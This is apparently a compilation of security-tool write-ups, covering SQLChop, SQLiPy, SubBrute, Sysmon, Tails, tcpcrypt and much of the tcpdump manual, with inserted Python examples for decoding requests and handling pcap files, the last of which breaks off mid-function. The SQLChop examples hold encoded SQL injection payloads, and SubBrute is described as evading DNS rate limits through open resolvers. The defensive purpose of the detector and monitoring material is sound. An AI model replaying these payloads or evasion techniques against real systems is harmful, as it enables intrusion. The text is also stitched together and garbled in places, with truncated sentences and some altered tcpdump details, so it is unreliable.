IPCat | https://raw.githubusercontent.com/client9/ipcat/master/datacenters.csv | IP Categorisation.
LinkedIn | http://www.linkedin.com | Scraping but future version to also use API.
malc0de.com | http://malc0de.com | Blacklists.
malwaredomainlist.com | http://www.malwaredomainlist.com | Blacklists.
malwaredomains.com | http://www.malwaredomains.com | Blacklists.
McAfee SiteAdvisor | http://www.siteadvisor.com | Site safety checker.
NameDroppers | http://www.namedroppers.org |
Notepad.cc | http://www.notepad.cc |
Nothink.org | http://www.nothink.org | Blacklists.
Onion.City | http://onion.city |
OpenBL | http://www.openbl.org | Blacklists.
PasteBin | http://www.pastebin.com | Achieved through Google scraping.
Pastie | http://www.pastie.org |
PGP Servers | http://pgp.mit.edu/pks/ |
PhishTank | http://www.phishtank.org | Identified phishing sites.
Project Honeypot | http://www.projecthoneypot.org | Blacklists. API key needed.
PunkSPIDER | http://www.punkspider.org |
RIPE/ARIN | http://stat.ripe.net/ |
Robtex | http://www.robtex.com |
SANS ISC | http://isc.sans.edu | Internet Storm Center IP reputation database.
SHODAN | http://www.shodanhq.com |
SORBS | http://www.sorbs.net | Blacklists.
SpamHaus | http://www.spamhaus.org | Blacklists.
ThreatExpert | http://www.threatexpert.com | Blacklists.
TOR Node List | http://torstatus.blutmagie.de |
TotalHash.com | http://www.totalhash.com | Domains/IPs used by malware.
UCEPROTECT | http://www.uceprotect.net | Blacklists.
VirusTotal | http://www.virustotal.com | Domains/IPs used by malware. API key needed.
WayBack Machine | http://www.archive.org |
Whois | Various |
XSSposed | http://www.xssposed.org |
Yahoo | http://www.yahoo.com | Scraping but future version to also use API.
Zone-H | http://www.zone-h.org |
INSTALLATION
The Basics
DownloadSptoolkit Rebirth
SQLASSIE - EFFECTIVE DATABASE SECURITY
DownloadSQLassie
SQLCHOP - SQL INJECTION DETECTION ENGINE
http://sqlchop.chaitin.com/doc.html
Dependencies
Build
Enjoy!
classify
Given a web application input, classify API will decode the
input and find possible SQL injection payload inside. If SQLi
payload found, payloads will be listed.
Parameter 1: object with following keys
1. urlpath: string, the urlpath of web request
2. body: string, the http body of POST/PUT request
3. cookie: string, the cookie content of web request
4. raw: string, other general field that needs general
decoding.
Parameter 2: detail, if detail is True, detailed payload list
will be returned, if False, only result will be returned,
which runs faster.
Return: an object contains result and payloads
1. result: int, positive value indicates the web request
contains sql injection payload
2. payloads: list of objects containing key, score, value
and source
key: string, reserved
source: string, shows where this payload is
embed in original web request and how the
payload is decoded
Examples here:
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.classify({'urlpath': '/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg=='}, True)
{
    'payloads': [{
        'key': '',
        'score': 4.070000171661377,
        'source': 'urlpath: querystring_decode b64decode url_decode ',
        'value': '-1 and 1=2 union select 1,2,3,chr(106),5,6,7,8,9,10,11,12 from admin'
    }],
    'result': 1
}
>>> detector.classify({'body': 'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&arrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&arrs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arrs1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arrs1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arrs1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&arrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
{
    'payloads': [{
        'key': '',
        'score': 3.9800000190734863,
        'source': 'body: querystring_decode ',
        'value': "SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)-- '"
    }, {
        'key': '',
        'score': 2.0899999141693115,
        'source': 'body: querystring_decode ',
        'value': "'SQL inject' and Password"
    }, {
        'key': '',
        'score': 2.180000066757202,
        'source': 'body: querystring_decode ',
Customization
The is_sqli API (in sqlchop.py) detects SQLi using a score of 2.1
as the threshold; you can adjust this threshold according to your
usage scenario.
def is_sqli(self, payload):
    ret = self.score_sqli(payload)
    return ret > 2.1

def classify(self, request, detail=False):
    ...
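The decoding chain behind the 'source' field in the examples above, as an added example that is not SQLChop's code (its scoring is not reproduced): each request field is split into parameter values, then base64 and percent-encoding are peeled off until nothing changes, and the chain is recorded in the same format SQLChop reports. The inputs are the two requests from the examples above; the decoder names and the printable-ASCII check are this example's own choices.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The two requests from the SQLChop examples, split as that section shows them.
SAMPLE_URLPATH = ('/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGN'
                  'ocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==')
SAMPLE_BODY = ('opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69'
               '&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&a'
               'rrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&'
               'arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&'
               'arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&ar'
               'rs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arr'
               's1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs'
               '1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arr'
               's1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arr'
               's1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arr'
               's1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&a'
               'rrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&a'
               'rrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&a'
               'rrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&'
               'arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&'
               'arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&ar'
               'rs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs'
               '1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1['
               ']=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]='
               '41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39')

B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def b64decode(value):
    """One base64 peel: accepts only well-formed input that decodes to printable ASCII."""
    if len(value) < 8 or len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode('ascii')
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def url_decode(value):
    """One percent-decoding peel; None when nothing was encoded."""
    decoded = unquote(value)
    return decoded if decoded != value else None


def querystring_decode(field, value):
    """Split a URL path, form body or cookie into parameter values.

    A repeated key whose values are all small integers (the arrs1[] trick in the
    second example) is reassembled into the string those character codes spell."""
    if field == 'urlpath':
        qs = urlsplit(value).query
    elif field == 'cookie':
        qs = value.replace('; ', '&')
    else:
        qs = value
    values = []
    for _key, items in parse_qs(qs, keep_blank_values=True).items():
        if len(items) > 1 and all(v.isdigit() and 0 < int(v) < 128 for v in items):
            values.append(''.join(chr(int(v)) for v in items))
        else:
            values.extend(items)
    return values


def decode_request(request, max_depth=8):
    """Return candidate payloads, each with a 'source' chain in SQLChop's format
    (field name, then every decoder applied, space-separated)."""
    candidates = []
    for field, value in request.items():
        if field in ('urlpath', 'body', 'cookie'):
            seeds = [(f'{field}: querystring_decode ', v) for v in querystring_decode(field, value)]
        else:  # 'raw': no parameter structure, only the encoding peels apply
            seeds = [(f'{field}: ', value)]
        for source, current in seeds:
            for _ in range(max_depth):  # bounded so nested encodings cannot loop forever
                peeled = b64decode(current)
                if peeled is not None:
                    source += 'b64decode '
                else:
                    peeled = url_decode(current)
                    if peeled is None:
                        break
                    source += 'url_decode '
                current = peeled
            candidates.append({'source': source, 'value': current})
    return candidates


if __name__ == '__main__':
    for cand in decode_request({'urlpath': SAMPLE_URLPATH}) + decode_request({'body': SAMPLE_BODY}):
        print(cand)
```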
DownloadSQLChop
SQLIPY - PLUGIN FOR BURP SUITE THAT INTEGRATES
SQLMAP USING THE SQLMAP API
Or, you can use the SQLMap API tab to select the IP/Port on
which to run, as well as the path to python and sqlmapapi.py on
your system.
Once the SQLMap API is running, it is just a matter of right
mouse clicking in the 'Request' sub tab of either the Target or
Proxy main tabs and choosing 'SQLiPy Scan'.
This will populate the SQLMap Scanner tab of the plugin with
information about that request. Clicking the 'Start Scan' button
will execute a scan.
If the page is vulnerable to SQL injection, then a thread from
the plugin will poll the results and add them to the Scanner
Results tab.
Read more here.
DownloadSQLiPy
SQLMAP-WEB-GUI - WEB GUI TO DRIVE NEAR FULL
FUNCTIONALITY OF SQLMAP
Requirements:
DownloadSQLMAP-Web-GUI
SQUERT - A SIMPLE QUERY AND REPORT TOOL
Requirements
Download Squert
SUBBRUTE - SUBDOMAIN BRUTEFORCER
SubBrute is a community driven project with the goal of
creating the fastest, and most accurate subdomain
enumeration tool. Some of the magic behind SubBrute is that it
uses open resolvers as a kind of proxy to circumvent DNS rate-limiting (https://www.us-cert.gov/ncas/alerts/TA13-088A). This
design also provides a layer of anonymity, as SubBrute does
not send traffic directly to the target's name servers.
What's new in v1.1?
manually:
http://www.dnspython.org/
Easy to use:
./subbrute.py google.com
Tests multiple domains:
./subbrute.py google.com gmail.com blogger.com
or a newline delimited list of domains:
./subbrute.py -t list.txt
Also keep in mind that subdomains can have subdomains
(example: _xmpp-server._tcp.gmail.com):
./subbrute.py gmail.com > gmail.out
./subbrute.py -t gmail.out
Download SubBrute
SUBDOMAIN ANALYZER - GET DETAILED INFORMATION
OF A DOMAIN
Requirements:
Linux Installation:
1. sudo apt-get install python-dev python-pip
2. sudo pip install -r requirements.txt
3. easy_install prettytable
Mac OS X Installation:
1. Install Xcode Command Line Tools (AppStore)
2. sudo easy_install pip, prettytable
3. sudo pip install -r requirements.txt
Windows Installation:
1. Install dnspython
2. Install gevent
3. Install prettytable
4. Open Command Prompt(cmd) as Administrator -> Goto
python folder -> Scripts (cd c:\Python27\Scripts)
5. pip install -r (Full Path To requirements.txt)
6. easy_install prettytable
DownloadSubDomain Analyzer
SUMO - SOFTWARE UPDATE MONITOR
DownloadSUMo
SYSMON V2.0 - SYSTEM ACTIVITY MONITOR FOR
WINDOWS
Usage:
Install: Sysmon.exe -i <configfile>
[-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)]
[-l (<process,...>)]
Configure: Sysmon.exe -c <configfile>
[--|[-h <[sha1|md5|sha256|imphash|*],...>] [-n
(<process,...>)]
[-l (<process,...>)]]
Uninstall: Sysmon.exe -u
Install with default settings
sysmon -accepteula -i
Install with md5 and sha256 hashing of process created and
monitoring network connections
sysmon -accepteula -i -h md5,sha256 -n
Install Sysmon with a configuration file (as described below)
sysmon -accepteula -i c:\windows\config.xml
Uninstall
sysmon -u
Dump the current configuration
sysmon -c
Change the configuration to use all hashes, no network
monitoring and monitoring of DLLs in Lsass
sysmon -c -h * -l lsass.exe
Change the configuration of sysmon with a configuration file (as
described below)
sysmon -c c:\windows\config.xml
Change the configuration to default settings
sysmon -c --
DownloadSysmon v2.0
TAILS 1.3 - THE AMNESIC INCOGNITO LIVE SYSTEM
DownloadTails 1.3
TAILS 1.4 - THE AMNESIC INCOGNITO LIVE SYSTEM
Tor Browser 4.5 now has a security slider that you can
use to disable browser features, such as JavaScript, as a
trade-off between security and usability. The security
slider is set to low by default to provide the same level of
Tor Browser 4.5 now keeps using the same Tor circuit
while you are visiting a website. This prevents the website
from suddenly changing language, behavior, or logging
you out.
installation of fonts-linuxlibertine.
DownloadTails 1.4
TAILS 1.7 - THE AMNESIC INCOGNITO LIVE SYSTEM
NEW FEATURES
Update the Tails signing key which is now valid until 2017.
FIXED PROBLEMS
Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user
to bypass read permissions on any file. (#10333)
DownloadTails 1.7
TCPCRYPT - ENCRYPTING THE INTERNET
difference in your everyday user experience, yet your traffic
will be more secure and you'll have made life much harder for
hackers.
So why is now the right time to turn on encryption? Here are
some reasons:
Intercepting communications today is simpler than
ever because of wireless networks. Ask a hacker how
many e-mail passwords can be intercepted at an airport
by just using a wifi-enabled laptop. This unsophisticated
attack is in reach of many. The times when only a few elite
had the necessary skill to eavesdrop are gone.
Computers have now become fast enough to encrypt
all Internet traffic. New computers come with special
hardware crypto instructions that allow encrypted
networking speeds of 10Gbit/s. How many of us even
achieve those speeds on the Internet or would want to
download (and watch) one movie per second? Clearly, we
can encrypt fast enough.
Research advances and the lessons learnt from over
10 years of experience with the web finally enabled us
to design a protocol that can be used in today's
Internet, by today's users. Our protocol is pragmatic: it
requires no changes to applications, it works with NATs
(i.e., compatible with your DSL router), and will work even
if the other end has not yet upgraded to tcpcrypt, in which
case it will gracefully fall back to using the old plain-text
TCP. No user configuration is required, making it
accessible to lay users: no more obscure requests like
"Please generate a 2048-bit RSA-3 key and a certificate
request for signing by a CA". Tcpcrypt can be
incrementally deployed today, and with time the whole
Internet will become encrypted.
How Tcpcrypt works
DownloadTcpcrypt
TCPDUMP - DUMP TRAFFIC ON A NETWORK
by tcpdump);
packets ``dropped by kernel'' (this is the number of packets that
were dropped, due to a lack of buffer space, by the packet
capture mechanism in the OS on which tcpdump is running, if
the OS reports that information to applications; if not, it will be
reported as 0).
On platforms that support the SIGINFO signal, such as most
BSDs (including Mac OS X) and Digital/Tru64 UNIX, it will
report those counts when it receives a SIGINFO signal
(generated, for example, by typing your ``status'' character,
typically control-T, although on some platforms, such as Mac
OS X, the ``status'' character is not set by default, so you must
set it with stty(1) in order to use it) and will continue capturing
packets. On platforms that do not support the SIGINFO signal,
the same can be achieved by using the SIGUSR1 signal.
Reading packets from a network interface may require that you
have special privileges; see the pcap (3PCAP) man page for
details. Reading a saved packet file doesn't require special
privileges.
OPTIONS
-A
Print each packet (minus its link level header) in ASCII. Handy
for capturing web pages.
-b
Print the AS number in BGP packets in ASDOT notation rather
than ASPLAIN notation.
-B buffer_size
--buffer-size=buffer_size
Set the operating system capture buffer size to buffer_size, in
units of KiB (1024 bytes).
-c count
Exit after receiving count packets.
-C file_size
Before writing a raw packet to a savefile, check whether the file
is currently larger than file_size and, if so, close the current
savefile and open a new one. Savefiles after the first savefile
will have the name specified with the -w flag, with a number
after it, starting at 1 and continuing upward. The units of
file_size are millions of bytes (1,000,000 bytes, not 1,048,576
bytes).
-d
Dump the compiled packet-matching code in a human readable
form to standard output and stop.
-dd
Dump packet-matching code as a C program fragment.
-ddd
Dump packet-matching code as decimal numbers (preceded
with a count).
-D
--list-interfaces
Print the list of the network interfaces available on the system
and on which tcpdump can capture packets. For each network
interface, a number and an interface name, possibly followed
by a text description of the interface, is printed. The interface
name or the number can be supplied to the -i flag to specify an
interface on which to capture.
This can be useful on systems that don't have a command to
list them (e.g., Windows systems, or UNIX systems lacking
ifconfig -a); the number can be useful on Windows 2000 and
later systems, where the interface name is a somewhat
complex string.
The -D flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_findalldevs()
function.
-e
Print the link-level header on each dump line. This can be used,
for example, to print MAC layer addresses for protocols such as
Ethernet and IEEE 802.11.
-E
Use spi@ipaddr algo:secret for decrypting IPsec ESP packets
that are addressed to addr and contain Security Parameter
Index value spi. This combination may be repeated with comma
or newline separation.
Note that setting the secret for IPv4 ESP packets is supported
at this time.
Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3-cbc, cast128-cbc, or none. The default is des-cbc. The ability
to decrypt packets is only present if tcpdump was compiled with
cryptography enabled.
secret is the ASCII text for ESP secret key. If preceded by 0x,
then a hex value will be read.
The option assumes RFC2406 ESP, not RFC1827 ESP. The
option is only for debugging purposes, and the use of this
option with a true `secret' key is discouraged. By presenting
IPsec secret key onto command line you make it visible to
others, via ps(1) and other occasions.
In addition to the above syntax, the syntax file name may be
used to have tcpdump read the provided file in. The file is
opened upon receiving the first ESP packet, so any special
permissions that tcpdump may have been given should already
have been given up.
-f
Print `foreign' IPv4 addresses numerically rather than
symbolically (this option is intended to get around serious brain
damage in Sun's NIS server --- usually it hangs forever
translating non-local internet numbers).
The test for `foreign' IPv4 addresses is done using the IPv4
address and netmask of the interface on which capture is being
done. If that address or netmask are not available,
either because the interface on which capture is being done
has no address or netmask or because the capture is being
done on the Linux "any" interface, which can capture on more
than one interface, this option will not work correctly.
-F file
Use file as input for the filter expression. An additional
expression given on the command line is ignored.
-G rotate_seconds
If specified, rotates the dump file specified with the -w option
every rotate_seconds seconds. Savefiles will have the name
specified by -w which should include a time format as defined
by strftime(3). If no time format is specified, each new file will
overwrite the previous.
If used in conjunction with the -C option, filenames will take the
form of `file<count>'.
-h
--help
Print the tcpdump and libpcap version strings, print a usage
message, and exit.
--version
Print the tcpdump and libpcap version strings and exit.
-H
Attempt to detect 802.11s draft mesh headers.
-i interface
--interface=interface
Listen on interface. If unspecified, tcpdump searches the
system interface list for the lowest numbered, configured up
interface (excluding loopback), which may turn out to be, for
example, ``eth0''.
-j tstamp_type
--time-stamp-type=tstamp_type
Set the time stamp type for the capture to tstamp_type. The
names to use for the time stamp types are given in pcap-tstamp(7); not all the types listed there will necessarily be valid
for any given interface.
-J
--list-time-stamp-types
List the supported time stamp types for the interface and exit. If
the time stamp type cannot be set for the interface, no time
stamp types are listed.
--time-stamp-precision=tstamp_precision
When capturing, set the time stamp precision for the capture to
tstamp_precision. Note that availability of high precision time
stamps (nanoseconds) and their actual accuracy is platform
and hardware dependent. Also note that when writing captures
made with nanosecond accuracy to a savefile, the time stamps
are written with nanosecond resolution, and the file is written
with a different magic number, to indicate that the time stamps
are in seconds and nanoseconds; not all programs that read
pcap savefiles will be able to read those captures.
When reading a savefile, convert time stamps to the precision
specified by timestamp_precision, and display them with that
resolution. If the precision specified is less than the precision of
time stamps in the file, the conversion will lose precision.
The supported values for timestamp_precision are micro for
microsecond resolution and nano for nanosecond resolution.
The default is microsecond resolution.
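The magic-number point above, as an added example that is not tcpdump's or libpcap's code: it reads the pcap global header to find the byte order and whether the file was written with nanosecond time stamps, then renders each record's time stamp at the resolution the header declares. The savefiles are constructed inside the block, not real captures.

```python
import struct

PCAP_MAGIC_MICRO = 0xA1B2C3D4  # classic savefile: seconds + microseconds
PCAP_MAGIC_NANO = 0xA1B23C4D   # written with --time-stamp-precision=nano: seconds + nanoseconds
GLOBAL_HEADER_LEN = 24
RECORD_HEADER_LEN = 16


def parse_pcap_header(data):
    """Read the 24-byte global header.

    The magic number is written in the writer's native byte order, so trying both
    orders tells us the endianness, and which of the two values matched tells us
    the time stamp precision."""
    if len(data) < GLOBAL_HEADER_LEN:
        raise ValueError('truncated pcap global header')
    for endian in ('<', '>'):
        magic = struct.unpack(endian + 'I', data[:4])[0]
        if magic in (PCAP_MAGIC_MICRO, PCAP_MAGIC_NANO):
            break
    else:
        raise ValueError('not a pcap savefile (magic 0x%08x)' % struct.unpack('>I', data[:4])[0])
    major, minor, _thiszone, _sigfigs, snaplen, linktype = struct.unpack(endian + 'HHiIII', data[4:24])
    return {
        'endian': endian,
        'precision': 'nano' if magic == PCAP_MAGIC_NANO else 'micro',
        'version': (major, minor),
        'snaplen': snaplen,
        'linktype': linktype,
    }


def iter_records(data):
    """Yield (timestamp_string, packet_bytes) per record.

    The fractional part is printed with 6 or 9 digits according to the header, so a
    nanosecond file is not mis-read as microseconds (which would be off by 1000)."""
    info = parse_pcap_header(data)
    frac_digits = 9 if info['precision'] == 'nano' else 6
    fmt = info['endian'] + 'IIII'
    offset = GLOBAL_HEADER_LEN
    while offset + RECORD_HEADER_LEN <= len(data):
        ts_sec, ts_frac, incl_len, _orig_len = struct.unpack(fmt, data[offset:offset + RECORD_HEADER_LEN])
        offset += RECORD_HEADER_LEN
        if incl_len > info['snaplen'] or offset + incl_len > len(data):
            raise ValueError('corrupt record at offset %d' % (offset - RECORD_HEADER_LEN))
        yield f'{ts_sec}.{ts_frac:0{frac_digits}d}', data[offset:offset + incl_len]
        offset += incl_len


def build_sample(magic, ts_frac, endian='<'):
    """Constructed one-packet savefile for this example (not a real capture)."""
    packet = bytes(14)  # a zeroed Ethernet header stands in for a frame
    header = struct.pack(endian + 'IHHiIII', magic, 2, 4, 0, 0, 262144, 1)
    record = struct.pack(endian + 'IIII', 1700000000, ts_frac, len(packet), len(packet))
    return header + record + packet


SAMPLE_MICRO = build_sample(PCAP_MAGIC_MICRO, 123)
SAMPLE_NANO = build_sample(PCAP_MAGIC_NANO, 123)

if __name__ == '__main__':
    for sample in (SAMPLE_MICRO, SAMPLE_NANO):
        info = parse_pcap_header(sample)
        for ts, pkt in iter_records(sample):
            print(info['precision'], ts, len(pkt), 'bytes')
```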
-K
--dont-verify-checksums
Don't attempt to verify IP, TCP, or UDP checksums. This is
useful for interfaces that perform some or all of those checksum
calculation in hardware; otherwise, all outgoing TCP
checksums will be flagged as bad.
-l
Make stdout line buffered. Useful if you want to see the data
tcpdump.
-M secret
Use secret as a shared secret for validating the digests found in
TCP segments with the TCP-MD5 option (RFC 2385), if
present.
-n
Don't convert addresses (i.e., host addresses, port numbers,
etc.) to names.
-N
Don't print domain name qualification of host names. E.g., if
you give this flag then tcpdump will print ``nic'' instead of
``nic.ddn.mil''.
-#
--number
Print an optional packet number at the beginning of the line.
-O
--no-optimize
Do not run the packet-matching code optimizer. This is useful
only if you suspect a bug in the optimizer.
-p
--no-promiscuous-mode
Don't put the interface into promiscuous mode. Note that the
interface might be in promiscuous mode for some other reason;
hence, `-p' cannot be used as an abbreviation for `ether host
{local-hw-addr} or ether broadcast'.
-Q direction
--direction=direction
Choose send/receive direction direction for which packets
should be captured. Possible values are `in', `out' and `inout'.
Not available on all platforms.
-q
Quick (quiet?) output. Print less protocol information so output
-u
Print undecoded NFS handles.
-U
--packet-buffered
If the -w option is not specified, make the printed packet output
``packet-buffered''; i.e., as the description of the contents of
each packet is printed, it will be written to the standard output,
rather than, when not writing to a terminal, being written only
when the output buffer fills.
If the -w option is specified, make the saved raw packet output
``packet-buffered''; i.e., as each packet is saved, it will be
written to the output file, rather than being written only when the
output buffer fills.
The -U flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_dump_flush()
function.
-v
When parsing and printing, produce (slightly more) verbose
output. For example, the time to live, identification, total length
and options in an IP packet are printed. Also enables additional
packet integrity checks such as verifying the IP and ICMP
header checksum.
When writing to a file with the -w option, report, every 10
seconds, the number of packets captured.
-vv
Even more verbose output. For example, additional fields are
printed from NFS reply packets, and SMB packets are fully
decoded.
-vvv
Even more verbose output. For example, telnet SB ... SE
options are printed in full. With -X Telnet options are printed in
hex as well.
-V file
Read a list of filenames from file. Standard input is used if file is
``-''.
-w file
Write the raw packets to file rather than parsing and printing
them out. They can later be printed with the -r option. Standard
output is used if file is ``-''.
This output will be buffered if written to a file or pipe, so a
program reading from the file or pipe may not see packets for
an arbitrary amount of time after they are received. Use the -U
flag to cause packets to be written as soon as they are
received.
The MIME type application/vnd.tcpdump.pcap has been
registered with IANA for pcap files. The filename
extension .pcap appears to be the most commonly used along
with .cap and .dmp. Tcpdump itself doesn't check the extension
when reading capture files and doesn't add an extension when
writing them (it uses magic numbers in the file header instead).
However, many operating systems and applications will use the
extension if it is present and adding one (e.g. .pcap) is
recommended.
See pcap-savefile(5) for a description of the file format.
-W
Used in conjunction with the -C option, this will limit the number
of files created to the specified number, and begin overwriting
files from the beginning, thus creating a 'rotating' buffer. In
addition, it will name the files with enough leading 0s to support
the maximum number of files, allowing them to sort correctly.
Used in conjunction with the -G option, this will limit the number
of rotated dump files that get created, exiting with status 0
when reaching the limit. If used with -C as well, the behavior
will result in cyclical files per timeslice.
-x
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet (minus its link level
header) in hex. The smaller of the entire packet or snaplen
bytes will be printed. Note that this is the entire link-layer
packet, so for link layers that pad (e.g. Ethernet), the padding
bytes will also be printed when the higher layer packet is
shorter than the required padding.
-xx
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet, including its link
level header, in hex.
-X
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet (minus its link level
header) in hex and ASCII. This is very handy for analysing new
protocols.
-XX
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet, including its link
level header, in hex and ASCII.
-y datalinktype
--linktype=datalinktype
Set the data link type to use while capturing packets to
datalinktype.
-z postrotate-command
Used in conjunction with the -C or -G options, this will make
tcpdump run "postrotate-command file" where file is the
savefile being closed after each rotation. For example,
specifying -z gzip or -z bzip2 will compress each savefile using
gzip or bzip2.
Note that tcpdump will run the command in parallel to the
capture, using the lowest priority so that this doesn't disturb the
capture process.
And in case you would like to use a command that itself takes
flags or different arguments, you can always write a shell script
that will take the savefile name as the only argument, make the
flags & arguments arrangements and execute the command
that you want.
-Z user
--relinquish-privileges=user
If tcpdump is running as root, after opening the capture device
or input savefile, but before opening any savefiles for output,
change the user ID to user and the group ID to the primary
group of user.
This behavior can also be enabled by default at compile time.
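The post-rotate hook that the -z description suggests writing as a shell script, written out here in Python as an added example (it is not tcpdump's own code). tcpdump execs it with the just-closed savefile as its only argument; the hook refuses anything that does not start with a pcap or pcapng magic number (the same header check tcpdump itself relies on instead of the extension), gzips the capture, records a SHA-256 sidecar in sha256sum format and removes the original. The interface, directory, user name and filter in the invocation comment are illustrative assumptions. Because -Z drops privileges before the savefile is opened and the hook inherits that user, the archive directory must be writable by it.

```python
#!/usr/bin/env python3
"""tcpdump -z hook (added example, not tcpdump's own code).

tcpdump runs it as `hook.py <savefile>` each time -C or -G closes a rotated
file. Illustrative invocation (interface, paths, user and filter assumed):

    tcpdump -i eth0 -n -C 100 -W 24 -Z tcpdump \
        -z /usr/local/bin/hook.py -w /var/log/pcap/trace.pcap 'not port 22'

-W 24 keeps a ring of 24 numbered files; -Z drops root before the savefile
is opened, and the hook inherits that user, so /var/log/pcap must be
writable by it.
"""
import gzip
import hashlib
import os
import shutil
import sys
import tempfile

# First four bytes of the pcap / pcapng file header. tcpdump identifies
# savefiles by these magic numbers, not by the file extension.
CAPTURE_MAGICS = {
    b"\xd4\xc3\xb2\xa1",  # pcap, little-endian, microsecond timestamps
    b"\xa1\xb2\xc3\xd4",  # pcap, big-endian, microsecond timestamps
    b"\x4d\x3c\xb2\xa1",  # pcap, little-endian, nanosecond timestamps
    b"\xa1\xb2\x3c\x4d",  # pcap, big-endian, nanosecond timestamps
    b"\x0a\x0d\x0d\x0a",  # pcapng section header block
}


def is_capture_file(path):
    """True if `path` starts with a known pcap or pcapng magic number."""
    with open(path, "rb") as fh:
        return fh.read(4) in CAPTURE_MAGICS


def sha256_of(path):
    """Hex SHA-256 of a file, streamed so multi-GB captures stay out of RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def postrotate(path):
    """Gzip `path`, write `<path>.gz.sha256` (sha256sum format) and delete the
    original. Returns the .gz path, or None if `path` is not a capture file
    (the file is then left untouched)."""
    if not is_capture_file(path):
        return None
    gz_path = path + ".gz"
    with open(path, "rb") as src, gzip.open(gz_path, "wb") as dst:
        shutil.copyfileobj(src, dst)
    with open(gz_path + ".sha256", "w") as fh:
        fh.write("%s  %s\n" % (sha256_of(gz_path), os.path.basename(gz_path)))
    os.remove(path)
    return gz_path


def demo():
    """Offline check on constructed files: a 24-byte little-endian pcap header
    (the smallest valid savefile) and a text file that must be refused."""
    work = tempfile.mkdtemp()
    header = b"\xd4\xc3\xb2\xa1" + b"\x02\x00\x04\x00" + b"\x00" * 16
    cap = os.path.join(work, "trace.pcap00")
    junk = os.path.join(work, "notes.txt")
    with open(cap, "wb") as fh:
        fh.write(header)
    with open(junk, "wb") as fh:
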